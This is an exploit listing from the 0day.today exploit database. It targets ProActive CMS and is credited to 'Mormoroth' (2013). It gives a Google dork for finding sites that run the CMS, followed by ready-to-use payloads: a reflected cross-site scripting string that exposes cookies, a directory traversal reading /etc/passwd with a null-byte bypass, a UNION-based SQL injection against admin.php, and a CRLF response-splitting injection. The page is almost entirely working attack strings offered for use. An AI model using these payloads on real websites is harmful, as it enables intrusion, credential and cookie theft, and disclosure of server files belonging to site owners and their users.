[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ProActive CMS Multiple Vulnerabilities

Author
Mormoroth
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-20169
Category
web applications
Date add
13-01-2013
Platform
php
# Exploit Title: ProActive CMS Multiple Vulnerabilities
# Google Dork: intext:"Powered by Proactive CMS"
# Date: 12.1.2013
# Exploit Author: Mormoroth
# Vendor Homepage: http://www.proactivecms.com
# Tested on: Linux
---------Cross Site Scripting---------

index.php?action=search&q=1</title>1<script >alert(document.cookie)</script>

---------Directory Traversal----------

/lavate/cute.old/Dialogs/Tag.Frame.php?setting=&Style=../../../../../../../../../../etc/passwd%00.jpg&Tab=Style&Tag=&Theme=&UC=

---------SQL Injection----------------

admin.php?action=helpSWF&id=1/**/union/**/select/**/1,@@version,3,4/*

---------HTML Spilitting--------------

/index.php?action=verifimage&code=%0d%0a%20Inject Your Own Code

--------------------------------------
ISCN TEAM
http://blog.mormoroth.ir
http://ha.cker.ir
http://twitter.com/Mormoroth

#  0day.today [2024-12-24]  #